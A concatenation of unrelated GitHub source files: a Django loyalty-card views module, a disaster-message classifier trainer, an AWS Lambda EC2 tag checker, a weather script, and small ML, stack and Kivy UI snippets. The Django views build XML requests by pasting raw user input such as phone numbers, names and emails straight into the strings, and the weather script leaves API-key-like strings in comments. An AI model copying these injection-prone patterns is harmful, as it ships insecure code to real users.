= 0 \n\n if account:\n auth = True\n phoneCart = request.session['Auth']\n\n \n context = {'stories': stories, 'big_discs': big_discs, 'crazySales': crazySales, 'categories': categories, 'auth':auth, 'qrcode':qrcode, 'bonus_account':bonus_account, 'account':account, 'cart':cart, 'phonecart':phoneCart}\n \n else:\n auth = False\n qrcode = False\n print('User not register.')\n context = {'stories': stories, 'big_discs': big_discs, 'crazySales': crazySales, 'categories': categories, 'auth':auth, 'qrcode':qrcode, 'bonus_account':bonus_account}\n \n else:\n auth = False\n qrcode = False\n context = {'stories': stories, 'big_discs': big_discs, 'crazySales': crazySales, 'categories': categories, 'auth':auth, 'qrcode':qrcode}\n else:\n auth = False\n qrcode = False\n context = {'stories': stories, 'big_discs': big_discs, 'crazySales': crazySales, 'categories': categories, 'auth':auth, 'qrcode':qrcode}\n\n return render(request, 'news/main.html', context)\n\ndef testUser(request):\n fav_color = request.session['fav_color']\n return JsonResponse({'session':fav_color})\n\ndef test(request):\n\n url='http://91.103.111.34:9192/'\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n # Истории заказов тест\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Account, Holder_Card, Holder_Coupon, Holder_Coupon_Available\n \n '''+request.session['Auth']+'''\n \n \n ''', headers=headers)\n\n\n \n\n\n\n\n\n obj = xmltodict.parse(obj_req.content)\n\n \n return JsonResponse({'session':obj})\n\n # print(obj[\"employees\"][\"employee\"]['role'])\n\n # return render(request, 'testing/test.html', {'obj':obj})\n\n\n@csrf_protect\ndef getphonekey(request):\n\n if request.method == 'POST':\n phone = request.POST['phone']\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n ''' + phone + '''\n Code_Timeout\n ''', headers=headers)\n # print('1')\n\n\n obj = xmltodict.parse(obj_req.content)\n\n if 'Registration' in obj or 'Login' in obj:\n err = {'success':True, 'obj':obj}\n else:\n\n err = {'success':False, 'obj':obj}\n\n return JsonResponse(err)\n\n\n\n@csrf_protect\ndef checkphonekey(request):\n\n if request.method == 'POST':\n phone = request.POST['phone']\n keysms = request.POST['keysms']\n res = {}\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n '''+phone+'''\n\n '''+keysms+'''\n ''', headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n userStory = {}\n \n\n # obj = None\n\n if 'Data' not in obj:\n\n \n res = {'success': False, 'response':obj}\n\n if 'Card_Code' in obj['Holder']['Cards']['Card']:\n\n request.session['Auth'] = phone\n\n\n print('-------1-----')\n\n print(phone)\n\n \n res = {'success': True}\n else:\n res = {'success': False, 'response':obj} \n\n else:\n\n if '@ErrorCode' not in obj['Data']:\n\n\n \n\n\n\n \n\n\n\n request.session['Auth'] = phone\n\n\n \n\n # request.session['HolderID'] = obj\n res = {'success': True}\n else:\n res = {'success': False, 
'response':obj}\n \n\n return JsonResponse(res)\n \n@csrf_protect\ndef profile(request):\n if request.method == 'POST':\n\n arr = {}\n if 'Auth' in request.session:\n\n auth = request.session['Auth']\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Account, Holder, Holder_Address, Holder_Image, Holder_Contact\n \n '''+auth+'''\n \n ''', headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n\n arr = {'success':True,'object':obj, 'auth':auth}\n \n else:\n\n\n arr = {'success':False}\n print('User not register.')\n\n return JsonResponse(arr)\n \ndef saveprofile(request):\n if request.method == 'POST':\n if 'Auth' in request.session:\n auth = request.session['Auth']\n\n l_name = request.POST['l_name']\n f_name = request.POST['f_name']\n birthday = request.POST['birthday']\n gender = request.POST['gender']\n email_name = request.POST['email_name']\n\n\n if email_name != '':\n mailVal = '''\n \n \n 1\n '''+email_name+'''\n True\n \n '''\n else:\n\n mailVal = ''\n\n\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n \n text = '''\n \n \n Holder, Holder_Address, Holder_Image, Holder_Contact\n \n \n '''+auth+'''\n '''+f_name+'''\n '''+l_name+'''\n '''+birthday+'''\n '''+gender+'''\n\n\n \n \n '''+mailVal+'''\n\n\n \n\n \n\n '''\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = text.encode('utf-8'), headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n\n else:\n print('User not register.')\n\n return JsonResponse({'success':True,'object':obj})\n \n\ndef generateqrcode(request):\n if request.method == 'POST':\n if 'Auth' in request.session:\n auth = request.session['Auth']\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n\n text = '''\n \n \n Holder_Card\n \n '''+auth+'''\n \n \n \n '''\n\n obj_req = requests.post('http://91.103.111.34:9192/', data = text.encode('utf-8'), headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n\n arr = {'success':True,'object':obj}\n\n else:\n print('User not register.')\n arr = {'success':False}\n\n return JsonResponse(arr)\n\ndef logoutprofile(request):\n if request.method == 'POST':\n if 'Auth' in request.session:\n del request.session['Auth']\n\n\n return JsonResponse({'success':True})\n\n@csrf_protect\ndef gethistory(request):\n\n if request.method == 'POST':\n if 'Auth' in request.session:\n\n print('1')\n\n arr = {'success': True}\n\n\n url='http://91.103.111.34:9192/'\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n # Истории заказов тест\n\n obj_req = requests.post(url, data = '''\n \n \n \n \n '''+request.session['HolderID']+'''\n 10000\n Transaction_DopInfo\n \n ''', headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n arr = {}\n\n array = []\n\n pay = []\n\n if 'Transaction' in obj['Transactions']:\n \n \n\n\n writeoff = []\n if len(obj['Transactions']['Transaction']) > 16:\n for val in obj['Transactions']['Transaction']:\n 
print('------------------------')\n\n \n \n\n if val['Transaction_Type'] == '22':\n if 'External_ID' in val:\n print(val['External_ID'])\n writeoff.append(val['External_ID'])\n \n \n if val['Transaction_Type'] == '11':\n if 'External_ID' in val:\n print(val['External_ID'])\n\n if val['External_ID'] in writeoff:\n # print(val['External_ID'])\n print(val)\n \n else:\n \n data = base64.b64decode(val['Dop_Info']['#text'])\n array.append(xmltodict.parse(data))\n\n if val['Transaction_Type'] == '12':\n print(val['Summ'])\n\n pay.append({'summa':val['Summ'], 'time':val['Transaction_Time'], 'name':val['Operation_Type_Name']})\n else:\n\n \n if obj['Transactions']['Transaction']['Transaction_Type'] == '12':\n print(obj['Transactions']['Transaction']['Summ'])\n pay.append({'summa':obj['Transactions']['Transaction']['Summ'], 'time':obj['Transactions']['Transaction']['Transaction_Time'], 'name':obj['Transactions']['Transaction']['Operation_Type_Name']})\n\n \n\n \n\n #print(val['Dop_Info']['#text'])\n \n \n # arr.update({'checkes': xmltodict.parse(data)})\n\n if not array and not pay:\n story_arr = {'success': False, 'story': obj}\n\n \n else:\n story_arr = {'success': True, 'story': array,'pay':pay, 'obj': obj, 'arrNote':writeoff}\n print()\n\n else:\n story_arr = {'success': False, 'obj': obj} \n\n\n else:\n story_arr = {'success': False}\n\n\n return JsonResponse(story_arr)\n\n\ndef getgifts(request):\n\n if request.method == 'POST':\n if 'Auth' in request.session:\n auth = request.session['Auth']\n\n url='http://91.103.111.34:9192/'\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n # Истории заказов тест\n\n obj_req = requests.post(url, data = '''\n \n \n\n '''+request.session['HolderID']+'''\n Holder_Coupon, Holder_Coupon_Available\n \n\n \n ''', headers=headers)\n obj = xmltodict.parse(obj_req.content)\n\n\n\n\n return JsonResponse({'success': True, 'coupons':obj['Holder']['Holders_Coupons']})\n\n\n\n\n\n\ndef market(request):\n\n # a_list = Article.objects.all()\n\n\n # url='http://ugits.net:1143/'\n # headers = {\n # 'Message-ID': '1',\n # 'Message-Type': 'Request',\n # 'Time': '2010-01-26 13:57:23',\n # 'Terminal-Type': '333',\n # 'Content-Length': '210',\n # 'Content-Type': 'text/text; charset=utf-8',\n\n # }\n\n # # Истории заказов тест\n\n # obj_req = requests.post(url, data = '''\n # \n # \n # \n # ''', headers=headers)\n # obj = xmltodict.parse(obj_req.content)\n\n\n\n\n # return JsonResponse({'success': True, 'coupons':obj})\n\n\n obj_req = requests.get('https://web-menu.stop.cash/api/v1/products?sn=AW38CB461SD4GH4N')\n # context = {'obj_req': obj_req}\n\n \n\n products = {'products': obj_req.json()}\n\n\n \n\n print(products)\n\n\n # return HttpResponse(obj_req, content_type=\"application/json\")\n return render(request, 'markets/market.html', products)\n\n\ndef likedapp(request):\n if request.method == 'POST':\n comment = Likedapp(theme= request.POST['title'], content=request.POST['content'])\n comment.save()\n\n return JsonResponse({'success': True})\n\n\n\n\n\ndef menuView(request):\n\n\n obj_req = requests.get('https://web-menu.stop.cash/api/v1/products?sn=AW38CB461SD4GH4N')\n\n return JsonResponse({'success': True, 'arr': obj_req})\n\n\n\ndef inactiveCart(request):\n\n if 'Auth' in request.session:\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 
'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n \n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Holder_Card\n \n '''+request.session['Auth']+'''\n \n \n ''', headers=headers)\n \n if obj_req.status_code == 200:\n\n print(obj_req.status_code)\n\n else:\n print(obj_req.status_code)\n \n obj = xmltodict.parse(obj_req.content)\n\n cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Card_Code']\n\n if cart:\n\n req_incative = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n '''+cart+'''\n ''', headers=headers)\n \n print(req_incative.status_code)\n\n if req_incative.status_code == 200:\n print(obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Status'])\n\n status_cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Status']\n\n context = {'success': True, 'cart':cart, 'status':'Inactive'}\n else:\n print('error')\n\n\n return JsonResponse(context)\n\n\ndef activeCart(request):\n\n\n if 'Auth' in request.session:\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n \n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Holder_Card\n \n '''+request.session['Auth']+'''\n \n \n ''', headers=headers)\n\n obj = xmltodict.parse(obj_req.content)\n\n cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Card_Code']\n\n if cart:\n\n req_aсtive = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n '''+cart+'''\n ''', headers=headers)\n \n print(req_aсtive.status_code)\n\n if req_aсtive.status_code == 200:\n print(obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Status'])\n\n status_cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Status']\n\n context = {'success': True, 'cart':cart, 'status':'active'}\n else:\n context = {'success': False}\n print('error')\n\n\n \n\n return JsonResponse(context)\n\n\n\n\n\n","repo_name":"andreysergeev98/licey","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73490481129","text":"#import libraries and load data from database\nimport sys\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom sqlalchemy import create_engine\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.pipeline import Pipeline #, FeatureUnion\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import classification_report\n\ndef load_data(database_filepath):\n '''\n Load the data from SQL Database and transform it to a data frame. 
Divide dataframe into X and Y.\n\n Input:\n database_filepath - filepath to the SQL database\n\n Returns:\n X - the messages to be categorized\n Y - the categories of the messages\n col_names - the names of the categories\n '''\n engine = create_engine('sqlite:///'+database_filepath)\n df = pd.read_sql_table('messages', con= engine)\n X = df['message'].values\n Y = df.drop(columns=['id','message','original','genre'])\n col_names=list(Y.columns)\n return X,Y,col_names\n\n\ndef tokenize(text):\n '''\n Tokenize text to process text data\n\n Input:\n text - a string to tokenize\n\n Returns:\n the tokens of the text\n '''\n tokens = []\n for tok in word_tokenize(text):\n tokens.append(WordNetLemmatizer().lemmatize(tok.lower().strip()))\n return tokens\n\n\ndef build_model():\n '''\n Build the model using a pipeline and GridSearch.\n\n Returns:\n model with defined GridSearch parameters\n '''\n # Build a machine learning pipeline\n pipeline = Pipeline([ \n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('mclf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n #Improve model with Grid Search\n parameters = {\n 'tfidf__smooth_idf': (True, False),\n 'mclf__estimator__n_estimators': (25, 50)\n }\n cv = GridSearchCV(pipeline, param_grid=parameters)\n return cv\n\n\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n '''\n Evaluate the model and print accuracy, precision, recall and f1-score for each category\n\n Input:\n model - transformed and fitted model\n X_test - the X values to be tested (the messages)\n Y_test - the Y values with the correct categories\n category_names - the names of the categories as list\n '''\n # Evaluate and print results\n Y_pred = pd.DataFrame(model.predict(X_test))\n for i in range(len(category_names)):\n print(category_names[i])\n cl = classification_report(Y_test.iloc[:,i], Y_pred.iloc[:,i],output_dict=True)\n try:\n print(" Accuracy: {:.4f}% Precision:{:.4f}% Recall: {:.4f}% f1: {:.4f}".\n format(cl.get('accuracy'),cl.get('1').get('precision'),\n cl.get('1').get('recall'),cl.get('1').get('f1-score')))\n except:\n print(" Accuracy: {:.4f}% Precision:{} Recall: {} f1: {}".\n format(cl.get('accuracy'),' - ',' - ',' - '))\n\n\ndef save_model(model, model_filepath):\n '''\n Saves the model to a pickle-file to a defined path.\n\n Input:\n model - transformed and fitted model\n model_filepath - the path of the pickle file\n '''\n # Save model in Pickle file\n pickle.dump(model, open(model_filepath, 'wb'))\n\n\ndef main():\n '''\n split the data into a training set and a test set. 
\n create a machine learning pipeline that uses NLTK, as well as scikit-learn's Pipeline and GridSearchCV to output a final model that uses the message column to predict classifications for 36 categories\n export your model to a pickle file\n '''\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n \n print('Building model...')\n model = build_model()\n \n print('Training model...')\n model.fit(X_train, Y_train)\n \n print('Evaluating model...')\n evaluate_model(model, X_test, Y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","repo_name":"msenser/disaster_response_pipeline_project","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31349331327","text":"# This script look for missing tags on EC2 instances\n# Initialize 5 Environment variables tag1...tag5\n# Usual tags to check can be as follows\n# - cpm backup\n# - monitor_site24x7\n# - Project\n# - Environment\n# - Owner\n\nimport boto3\nimport logging\nimport os\n\nlambda_func_name = os.getenv(\"AWS_LAMBDA_FUNCTION_NAME\", \"\")\n\nif lambda_func_name == \"\": # We are not running in AWS\n boto3.setup_default_session(profile_name='iconwater')\n\n# setup simple logging for INFO\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n# define the connection\nec2 = boto3.resource('ec2')\n\ndef send_alert(alert_data):\n \n topic_arn = os.getenv(\"TopicARN\", \"\")\n \n if topic_arn == \"\":\n print(\"send_alert: Missing topic ARN. 
Returning without sending alert.")\n return\n\n subject = os.getenv('CustomerID', '') + " - Missing EC2 Instances Tag Check"\n message = "Missing EC2 Instances Tag Check Results: \\n\\n" + alert_data\n\n print("send_alert: *** Sending alert ***")\n print("send_alert: Message: {0}".format(message))\n\n client = boto3.client('sns')\n response = client.publish(TargetArn=topic_arn, \n Message=message, \n Subject=subject)\n\ndef find_instances_with_missing_tags(tag_to_check):\n\n result_str = ""\n\n client = boto3.client('ec2', region_name='ap-southeast-2')\n # Check running or stopped instances\n response = client.describe_instances(\n Filters=[\n {\n 'Name': 'instance-state-name',\n 'Values': ['running', 'stopped']\n }\n ])\n # Iterate over instance(s)\n for r in response['Reservations']:\n for inst in r['Instances']:\n inst_id = inst['InstanceId']\n tags = inst['Tags']\n # Check the Name tag\n for tag in tags:\n if 'Name' in tag['Key']:\n ins_name = (tag['Value'])\n break\n else:\n ins_name = "{No-Name}"\n\n for tag in tags:\n if tag_to_check in tag['Key']:\n ins_tag = (tag['Value'])\n break\n else:\n ins_tag = "NA"\n\n if ins_tag == "NA":\n s = "Tag '{}' missing for instance {} ({})\\n\\n".format(tag_to_check, ins_name, inst['InstanceId'])\n #print (s)\n result_str = result_str + s\n #else:\n # print("Tag '{}' present for instance {} ({})".format(tag_to_check, ins_name, inst['InstanceId']))\n\n return result_str\n\ndef lambda_handler(event, context):\n \n tag1 = os.getenv("tag1", "")\n tag2 = os.getenv("tag2", "")\n tag3 = os.getenv("tag3", "")\n tag4 = os.getenv("tag4", "")\n tag5 = os.getenv("tag5", "")\n\n s = ""\n\n if tag1 != "": s = s + find_instances_with_missing_tags(tag1)\n if tag2 != "": s = s + find_instances_with_missing_tags(tag2)\n if tag3 != "": s = s + find_instances_with_missing_tags(tag3)\n if tag4 != "": s = s + find_instances_with_missing_tags(tag4)\n if tag5 != "": s = s + find_instances_with_missing_tags(tag5)\n\n if s != "":\n print(s)\n send_alert(s)\n\n return 0\n\nif __name__ == "__main__":\n lambda_handler(0, 0)\n","repo_name":"shariqmus/work-examples","sub_path":"monitoring/kms-mandatory-tags-check-tool/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70579758568","text":"# -*- coding: utf-8 -*-\n\n"""\n@Author : Zijian Huang\n@Contact : zijian_huang@sjtu.edu.cn\n@FileName: costFunctionReg.py\n@Time : 20-1-10 1:27 PM\n"""\nimport numpy as np\nfrom sigmoid import sigmoid\n\n\ndef costFunctionReg(theta, X, y, reg_factor, requires_grad=False):\n m = len(y)\n h = sigmoid(X @ theta)\n J = -1.0 / m * (y.T @ np.log(h) + (1 - y).T @ np.log(1 - h)) \\\n + reg_factor / (2.0 * m) * theta[1:].T @ theta[1:]\n if requires_grad:\n grad = X.T @ (h - y) / m\n grad[1:] = grad[1:] + reg_factor * theta[1:] / m\n return J, grad\n else:\n return J\n\n","repo_name":"Closedboy/Machine-Learning-exercise-python","sub_path":"ex3/costFunctionReg.py","file_name":"costFunctionReg.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2959859433","text":"class Solution:\n def removeAdj(self,v,n):\n # Your code goes here\n stack = []\n for e in v:\n if len(stack) == 0:\n stack.append(e)\n else:\n top = stack[-1]\n if top == e:\n stack.pop()\n else:\n 
stack.append(e)\n \n return len(stack)\n \n\n#{ \n# Driver Code Starts\n\n\nif __name__=='__main__':\n tcs=int(input())\n\n for _ in range(tcs):\n n=int(input())\n v=[x for x in input().split()]\n ob = Solution()\n print(ob.removeAdj(v,n))\n# } Driver Code Ends","repo_name":"gorebhaven7/DSA-EASY","sub_path":"3.Stack/3.String Manupulation/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41629550884","text":"#virtualenv venv\n#source version/bin/activate.fish\n#pip install requests\n#pip install python-dotenv\n#pip freeze> requirements.txt\n#Switch the interpreter\n\nimport requests\nfrom dotenv import load_dotenv\nfrom os import getenv\nload_dotenv()\n\n#8a27d483ee8c053eb537a4b7388dcb72\n# p = getenv('passw')\n# a = getenv('login')\n# b = getenv('email')\n# print(p, a, b)\n\n# weatheApi =getenv('WeatherApi')\n# # city = input('Enter the city name: ')\n# city = "Almaty"\n# url = f'https://api.openweathermap.org/data/2.5/weather?q={city}&appid={weatheApi}&units=metric'\n\n# response = requests.get(url)\n# data = response.json()\n# print(data)\n\n# d5bb44d0fa8e39e2339c9019d833d826\nimport requests\nfrom datetime import datetime\n# from pprint import pprint\nfrom os import getenv, system\nfrom dotenv import load_dotenv\nload_dotenv()\n\nWEATHER_API = getenv('WEATHER_API')\n# city = input("Enter the city name: ")\n\n\ndef weather_service(get_city,API=WEATHER_API):\n """Your weather bot instantly shows the weather in any city,\n providing up-to-date information on air temperature, humidity and the chance of rain. \n This helps you plan your day more effectively and stay aware of weather events \n in real time.\n\n get_city = 'Almaty'\n API = Weather_API\n\n weather_service(get_city :str, API=WEATHER_API) -> str:\n\n """\n\n url = f'https://api.openweathermap.org/data/2.5/weather?q={get_city}&appid={API}&units=metric'\n\n response = requests.get(url)\n data = response.json()\n\n # pprint(data)\n print(len(data))\n\n Pr_day = datetime.fromtimestamp(data['sys']['sunset']) - datetime.fromtimestamp(data['sys']['sunrise'])\n information = f"""Pogoda Daniyar\n Strana: {data['sys']['country']}\n Nazvanie goroda: {data['name']} {data['weather'][0]['description']} {data['clouds']['all']}%\n Temperature : {data['main']['temp']}°C\n Oshushaetsya : {data['main']['feels_like']}°C\n vlazhnost : {data['main']['humidity']}%\n davlenie vozduha : {data['main']['pressure']} gPa\n skorost vetra : {data['wind']['speed']}m/s\n Napravlenie : {data['wind']['deg']}°\n Voshod solnca : {datetime.fromtimestamp(data['sys']['sunrise'])}\n Prodolzhitelnost dnya : {Pr_day}\n Zakat solnca : {datetime.fromtimestamp(data['sys']['sunset'])}\n """\n\n return(information)\nprint(weather_service("Almaty"))","repo_name":"Daniyarkenn/Weather_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9113140348","text":"import tkinter as Tk\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nimport countryGUI\nimport mlSandbox\nimport GuiOption\n\nclass Historic3DGui(countryGUI.CountryGui):\n \n def __init__(self, country_data):\n self.options3d = {}\n self.options3d[1] = GuiOption.Option("Population", "pop")\n self.options3d[2] = GuiOption.Option("GDP per 
Capita\", \"gdpPercap\")\n self.options3d[3] = GuiOption.Option(\"Life Expectancy\", \"lifeExp\")\n\n super().__init__(country_data, None, \"year\")\n \n def plotData(self):\n \n ax = plt.axes(projection =\"3d\") \n ax.set_xlabel(self.xAxisName)\n ax.set_ylabel(self.options3d[2].displayName)\n ax.set_zlabel(self.options3d[3].displayName)\n plt.title(\" Time, Gdp Per Capita, and Life Expectancy 3D\")\n \n for country in self.countryContainer:\n country = self.dataFrame.loc[country]\n xData = list(country[self.xAxisName])\n yData = list(country[self.options3d[2].pandasName])\n zData = list(country[self.options3d[3].pandasName])\n ax.scatter3D(xData, yData, zData, cmap = 'hsv', label = country.index[0])\n \n plt.legend(loc = \"upper left\") \n plt.show()\n\ndef main():\n country_data = mlSandbox.getCountryData()\n gui = Historic3DGui(country_data)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Michael-Paluda/mlSandbox","sub_path":"Historic3DDataViewer.py","file_name":"Historic3DDataViewer.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4885385646","text":"from kivy.lang import Builder\nfrom kivy.metrics import dp\nfrom kivy.properties import ObjectProperty, StringProperty, BooleanProperty\n\nfrom configs.color import OneUIColors\nfrom features.browser_rule import data\nfrom features.browser_rule.controller import BrowserRuleController\nfrom widgets.layout import OneUIBox, OneUIGrid\nfrom widgets.panel import OneUIExpandablePanel\nfrom widgets.toolbar import OneUITopBar\n\nBuilder.load_file(\"features/browser_rule/add/ui.kv\")\n\n\nclass OneUIBrowserRule(OneUIBox):\n rule = ObjectProperty()\n saved = BooleanProperty(force_dispatch=True)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.id = None\n self.orientation = 'vertical'\n self.spacing = 15\n self.md_bg_color = OneUIColors.PageBackground.value\n\n def add_response_logics(self, response: data.BrowserRuleResponse = data.BrowserRuleResponse()):\n if self.ids.rule_logics:\n _widget = OneUIRuleLogicWidget()\n _widget.response = response\n\n body_container = OneUIExpandablePanel()\n head_panel = OneUIBrowserResponseHeaderPanel()\n head_panel.toggle = lambda: body_container.toggle_body_content()\n head_panel.remove = lambda: self.remove_response(body_container)\n head_panel.on_release = lambda: body_container.toggle_body_content()\n _widget.ids.tags.bind(text=head_panel.ids.browser_rule_response_header.setter(\"text\"))\n\n body_container.head = head_panel\n body_container.bodies = [_widget]\n body_container.adaptive_height = True\n self.ids.rule_logics.add_widget(body_container)\n\n def remove_response(self, child):\n self.ids.rule_logics.remove_widget(child)\n\n def save(self):\n BrowserRuleController.save(self.data)\n self.saved = True\n\n def on_rule(self, _, rule: data.Rule):\n self.id = rule.id\n self.ids.name.text = rule.name\n self.ids.description.text = rule.description\n self.ids.source_type.text = rule.source_type\n self.ids.operator.text = rule.operator\n self.ids.source.text = rule.source\n self.ids.is_enabled.active = rule.is_enabled\n self.ids.rule_logics.clear_widgets()\n for response in rule.responses:\n self.add_response_logics(response)\n\n @property\n def data(self) -> data.Rule:\n have_responses = len(self.ids.rule_logics.children) > 0\n _rule = data.Rule(\n id=self.id,\n name=self.ids.name.text,\n description=self.ids.description.text,\n source_type=self.ids.source_type.text,\n 
operator=self.ids.operator.text,\n source=self.ids.source.text,\n is_enabled=self.ids.is_enabled.active\n )\n _responses = [response.data for response in self.ids.rule_logics.children[0].children\n if (isinstance(response, OneUIRuleLogicWidget))] if have_responses else []\n _rule.responses = _responses\n return _rule\n\n\nclass OneUIRuleLogicWidget(OneUIGrid):\n response = ObjectProperty(data.BrowserRuleResponse())\n\n def __init__(self, response: data.BrowserRuleResponse = data.BrowserRuleResponse()):\n super(OneUIRuleLogicWidget, self).__init__()\n self.padding = dp(25)\n self.spacing = 20\n self.md_bg_color = OneUIColors.Background.value\n self.adaptive_height = True\n self.response = response\n\n def on_response(self, _, response: data.BrowserRuleResponse):\n self.ids.data_source_type.text = response.data_source_type\n self.ids.http_method.text = response.http_method\n self.ids.tags.text = response.tags\n self.ids.delay.text = str(response.delay)\n self.ids.is_logic_enabled.active = response.is_logic_enabled\n for _filter in response.filters:\n self.add_filter(_filter)\n\n def update_control(self, source_type: str):\n self.ids.browser_rule_data_widget_handler.clear_widgets()\n if source_type == 'r':\n self.ids.browser_rule_data_widget_handler.add_widget(OneUIBrowserRuleDataLink())\n if source_type == 'd':\n self.ids.browser_rule_data_widget_handler.add_widget(OneUIBrowserRuleData())\n\n def add_filter(self, _filter: data.RequestFilter = data.RequestFilter()) -> None:\n if self.ids:\n _widget = OneUIRuleLogicFilterWidget()\n _widget.filter = _filter\n _widget.remove = lambda x: self.remove_filter(_widget)\n self.ids.filters.add_widget(_widget)\n\n def remove_filter(self, child) -> None:\n if self.ids:\n self.ids.filters.remove_widget(child)\n\n @property\n def data(self) -> data.BrowserRuleResponse:\n\n have_data = len(self.ids.browser_rule_data_widget_handler.children) > 0\n return data.BrowserRuleResponse(\n delay=int(self.ids.delay.text),\n data_source_type=self.ids.data_source_type.text,\n http_method=self.ids.http_method.text,\n is_logic_enabled=self.ids.is_logic_enabled.active,\n tags=self.ids.tags.text,\n filters=[_filter.data for _filter in self.ids.filters.children],\n data=self.ids.browser_rule_data_widget_handler.children[0].data if have_data else data.MockData()\n )\n\n\nclass OneUIRuleLogicFilterWidget(OneUIGrid):\n filter = ObjectProperty()\n\n remove = 